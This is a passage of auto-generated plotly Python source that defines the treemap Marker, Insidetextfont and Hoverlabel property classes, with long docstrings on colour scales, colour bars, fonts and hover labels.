def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorbar
# --------
@property
def colorbar(self):
"""
The 'colorbar' property is an instance of ColorBar
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.ColorBar
- A dict of string/value properties that will be passed
to the ColorBar constructor
Supported dict properties:
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) of the border enclosing
this color bar.
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has the special value
"M<n>", which gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
len
Sets the length of the color bar. This measure
excludes the padding of both ends. That is, the
color bar length is this length minus the
padding on both ends.
lenmode
Determines whether this color bar's length
(i.e. the measure in the color variation
direction) is set in units of plot "fraction"
or in "pixels". Use `len` to set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar. This
measure excludes the size of the padding, ticks
and labels.
thicknessmode
Determines whether this color bar's thickness
(i.e. the measure in the constant color
direction) is set in units of plot "fraction"
or in "pixels". Use `thickness` to set the
value.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format
And for dates see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format
We add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
A tuple of plotly.graph_objects.treemap.marker.
colorbar.Tickformatstop instances or dicts with
compatible properties
tickformatstopdefaults
When used in a template (as layout.template.dat
a.treemap.marker.colorbar.tickformatstopdefault
s), sets the default property values to use for
elements of
treemap.marker.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objects.treemap.marker.colorbar.Ti
tle instance or dict with compatible properties
titlefont
Deprecated: Please use
treemap.marker.colorbar.title.font instead.
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
titleside
Deprecated: Please use
treemap.marker.colorbar.title.side instead.
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the color
bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
plotly.graph_objs.treemap.marker.ColorBar
"""
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
# colors
# ------
@property
def colors(self):
"""
Sets the color of each sector of this trace. If not specified,
the default trace color set is used to pick the sector colors.
The 'colors' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["colors"]
@colors.setter
def colors(self, val):
self["colors"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if colors is set to a
numerical array. The colorscale must be an array containing
arrays mapping a normalized value to an rgb, rgba, hex, hsl,
hsv, or named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
bounds of the colorscale in color space, use `marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a palette
name string of the following list: Greys,YlGnBu,Greens,YlOrRd,B
luered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Blackbod
y,Earth,Electric,Viridis,Cividis.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd']
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# colorssrc
# ---------
@property
def colorssrc(self):
"""
Sets the source reference on plot.ly for colors .
The 'colorssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorssrc"]
@colorssrc.setter
def colorssrc(self, val):
self["colorssrc"] = val
# depthfade
# ---------
@property
def depthfade(self):
"""
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This option is
unavailable when a `colorscale` is present, defaults to false
when `marker.colors` is set, but otherwise defaults to true.
When set to "reversed", the fading direction is inverted, that
is the top elements within hierarchy are drawn with fully
saturated colors while the leaves are faded towards the
background color.
The 'depthfade' property is an enumeration that may be specified as:
- One of the following enumeration values:
[True, False, 'reversed']
Returns
-------
Any
"""
return self["depthfade"]
@depthfade.setter
def depthfade(self, val):
self["depthfade"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Line
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of the line enclosing each
sector. Defaults to the `paper_bgcolor` value.
colorsrc
Sets the source reference on plot.ly for color
.
width
Sets the width (in px) of the line enclosing
each sector.
widthsrc
Sets the source reference on plot.ly for width
.
Returns
-------
plotly.graph_objs.treemap.marker.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# pad
# ---
@property
def pad(self):
"""
The 'pad' property is an instance of Pad
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Pad
- A dict of string/value properties that will be passed
to the Pad constructor
Supported dict properties:
b
Sets the padding from the bottom (in px).
l
Sets the padding from the left (in px).
r
Sets the padding from the right (in px).
t
Sets the padding from the top (in px).
Returns
-------
plotly.graph_objs.treemap.marker.Pad
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. Has an effect only if
colors is set to a numerical array. If true, `marker.cmin` will
correspond to the last color in the array and `marker.cmax`
will correspond to the first color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# showscale
# ---------
@property
def showscale(self):
"""
Determines whether or not a colorbar is displayed for this
trace. Has an effect only if colors is set to a numerical array.
The 'showscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colors is set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax`. Has an
effect only if colors is set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colors is set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colors is set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colors is set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colors is set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colors is set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colors is set to a
numerical array.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
coloraxis=None,
colorbar=None,
colors=None,
colorscale=None,
colorssrc=None,
depthfade=None,
line=None,
pad=None,
reversescale=None,
showscale=None,
**kwargs
):
"""
Construct a new Marker object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Marker
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colors is set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax`. Has an
effect only if colors is set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colors is set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colors is set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colors is set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colors is set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colors is set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colors is set to a
numerical array.
Returns
-------
Marker
"""
super(Marker, self).__init__("marker")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Marker"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import marker as v_marker
# Initialize validators
# ---------------------
self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
self._validators["cauto"] = v_marker.CautoValidator()
self._validators["cmax"] = v_marker.CmaxValidator()
self._validators["cmid"] = v_marker.CmidValidator()
self._validators["cmin"] = v_marker.CminValidator()
self._validators["coloraxis"] = v_marker.ColoraxisValidator()
self._validators["colorbar"] = v_marker.ColorBarValidator()
self._validators["colors"] = v_marker.ColorsValidator()
self._validators["colorscale"] = v_marker.ColorscaleValidator()
self._validators["colorssrc"] = v_marker.ColorssrcValidator()
self._validators["depthfade"] = v_marker.DepthfadeValidator()
self._validators["line"] = v_marker.LineValidator()
self._validators["pad"] = v_marker.PadValidator()
self._validators["reversescale"] = v_marker.ReversescaleValidator()
self._validators["showscale"] = v_marker.ShowscaleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
_v = arg.pop("cauto", None)
self["cauto"] = cauto if cauto is not None else _v
_v = arg.pop("cmax", None)
self["cmax"] = cmax if cmax is not None else _v
_v = arg.pop("cmid", None)
self["cmid"] = cmid if cmid is not None else _v
_v = arg.pop("cmin", None)
self["cmin"] = cmin if cmin is not None else _v
_v = arg.pop("coloraxis", None)
self["coloraxis"] = coloraxis if coloraxis is not None else _v
_v = arg.pop("colorbar", None)
self["colorbar"] = colorbar if colorbar is not None else _v
_v = arg.pop("colors", None)
self["colors"] = colors if colors is not None else _v
_v = arg.pop("colorscale", None)
self["colorscale"] = colorscale if colorscale is not None else _v
_v = arg.pop("colorssrc", None)
self["colorssrc"] = colorssrc if colorssrc is not None else _v
_v = arg.pop("depthfade", None)
self["depthfade"] = depthfade if depthfade is not None else _v
_v = arg.pop("line", None)
self["line"] = line if line is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("reversescale", None)
self["reversescale"] = reversescale if reversescale is not None else _v
_v = arg.pop("showscale", None)
self["showscale"] = showscale if showscale is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
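# Usage sketch (illustrative): coloring sectors from a numerical array
# so that the continuous-color attributes (`colorscale`, `cmin`/`cmax`,
# `showscale`, ...) take effect. Sample values are hypothetical.
#
#     import plotly.graph_objects as go
#
#     trace = go.Treemap(
#         labels=["root", "A", "B", "C"],
#         parents=["", "root", "root", "root"],
#         marker=go.treemap.Marker(
#             colors=[0.0, 0.3, 0.6, 0.9],  # numeric values -> colorscale
#             colorscale="Viridis",
#             cmin=0.0,
#             cmax=1.0,
#             showscale=True,                     # display the color bar
#             line=dict(color="white", width=1),  # sector outline
#         ),
#     )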
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Insidetextfont object
Sets the font used for `textinfo` lying inside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Insidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Insidetextfont
"""
super(Insidetextfont, self).__init__("insidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import insidetextfont as v_insidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_insidetextfont.ColorValidator()
self._validators["colorsrc"] = v_insidetextfont.ColorsrcValidator()
self._validators["family"] = v_insidetextfont.FamilyValidator()
self._validators["familysrc"] = v_insidetextfont.FamilysrcValidator()
self._validators["size"] = v_insidetextfont.SizeValidator()
self._validators["sizesrc"] = v_insidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on plot.ly for align .
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
